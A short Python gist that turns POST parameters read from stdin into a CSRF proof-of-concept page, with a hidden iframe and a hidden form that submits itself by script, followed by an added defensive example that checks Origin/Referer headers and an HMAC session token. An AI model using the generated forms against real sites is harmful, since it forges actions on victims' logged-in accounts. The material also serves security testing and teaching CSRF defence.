@disconnect3d
Created September 2, 2016 09:50
Generates POST CSRF html
"""
Takes input on stdin and generates html doing POST CSRF
E.g. input:
a=b&c=d
"""
import sys
import urllib
from collections import OrderedDict
post_data = sys.stdin.read()
post_data = post_data.strip()
params = OrderedDict(
(urllib.unquote(key), urllib.unquote(value)) for key, value in map(lambda i: i.split('='), post_data.split('&'))
)
html = """
<iframe style="display:none" name="csrf-frame"></iframe>
<form method='POST' action='{url}' target="csrf-frame" id="csrf-form">
{inputs}
<input type='submit' style="display:none" value='submit'>
</form>
<script>
document.getElementById("csrf-form").submit()
</script>
"""
input_fmt = "<input type='hidden' name='{name}' value='{value}'>"
inputs = '\n '.join(input_fmt.format(name=k, value=v) for k,v in params.items())
url = ''
print html.format(url=url, inputs=inputs)
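
An added example, not part of the gist: a server-side check that refuses the kind of cross-site, auto-submitted form POST the script above produces, by validating `Origin`/`Referer` and a session-bound token. The secret, the allowed origin, the `csrf_token` field name and the function names are assumptions made for the example.

```python
import hashlib
import hmac
from urllib.parse import parse_qsl, urlsplit

# Assumptions for this example: a per-deployment secret, the site's own
# origin, and a hidden form field named csrf_token.
SECRET = b"constructed-demo-secret"
ALLOWED_ORIGINS = {"https://app.example"}


def issue_token(session_id):
    """Token bound to the session with HMAC-SHA256; embedded in real forms."""
    return hmac.new(SECRET, session_id.encode(), hashlib.sha256).hexdigest()


def check_post(headers, body, session_id):
    """Return (allowed, reason) for a form-encoded, state-changing POST.

    headers is a dict with canonical names ("Origin", "Referer").
    """
    origin = headers.get("Origin")
    if origin is None and headers.get("Referer"):
        ref = urlsplit(headers["Referer"])
        origin = f"{ref.scheme}://{ref.netloc}"
    # A browser submitting a form hosted on another site reports that
    # site's origin, so the request is refused before the body is parsed.
    if origin is not None and origin not in ALLOWED_ORIGINS:
        return False, "cross-origin"
    # Origin and Referer can both be absent, so the token is always checked.
    fields = dict(parse_qsl(body, keep_blank_values=True))
    token = fields.get("csrf_token", "").encode()
    expected = issue_token(session_id).encode()
    if not hmac.compare_digest(token, expected):
        return False, "bad-token"
    return True, "ok"


if __name__ == "__main__":
    sid = "constructed-session-id"
    forged = "a=b&c=d"  # constructed: body of a generated form, no token
    genuine = forged + "&csrf_token=" + issue_token(sid)
    print(check_post({"Origin": "https://other.example"}, forged, sid))
    print(check_post({}, forged, sid))
    print(check_post({"Origin": "https://app.example"}, genuine, sid))
```

Setting `SameSite=Lax` or `SameSite=Strict` on the session cookie adds a browser-side layer, since the cookie is then withheld from cross-site form POSTs.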